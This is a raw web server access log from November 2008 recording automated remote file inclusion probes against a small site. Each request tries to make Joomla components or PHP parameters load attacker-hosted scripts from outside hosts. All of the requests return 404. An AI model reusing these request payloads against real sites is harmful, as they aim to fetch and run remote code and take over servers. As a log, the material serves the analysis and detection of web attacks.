201.80.215.232 - - [30/Nov/2008:18:06:13 -0800] "GET /index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
201.80.215.232 - - [30/Nov/2008:18:06:13 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
63.247.65.114 - - [30/Nov/2008:18:06:20 -0800] "GET /logs/access_080818.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.65.114 - - [30/Nov/2008:18:06:20 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.65.114 - - [30/Nov/2008:18:06:20 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:06:29 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:06:29 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:06:50 -0800] "GET /logs/access_080609.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:06:51 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:06:51 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:07:14 -0800] "GET /logs/access_080818.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:07:14 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:07:14 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.12.200.23 - - [30/Nov/2008:18:07:20 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
94.23.0.108 - - [30/Nov/2008:18:07:30 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.80.215.232 - - [30/Nov/2008:18:07:32 -0800] "GET /logs/access_080818.log/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.80.215.232 - - [30/Nov/2008:18:07:32 -0800] "GET /index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.80.215.232 - - [30/Nov/2008:18:07:32 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:18:07:36 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:07:42 -0800] "GET /logs/access_080929.log/sub.php?sub=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:07:42 -0800] "GET /sub.php?sub=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com" 70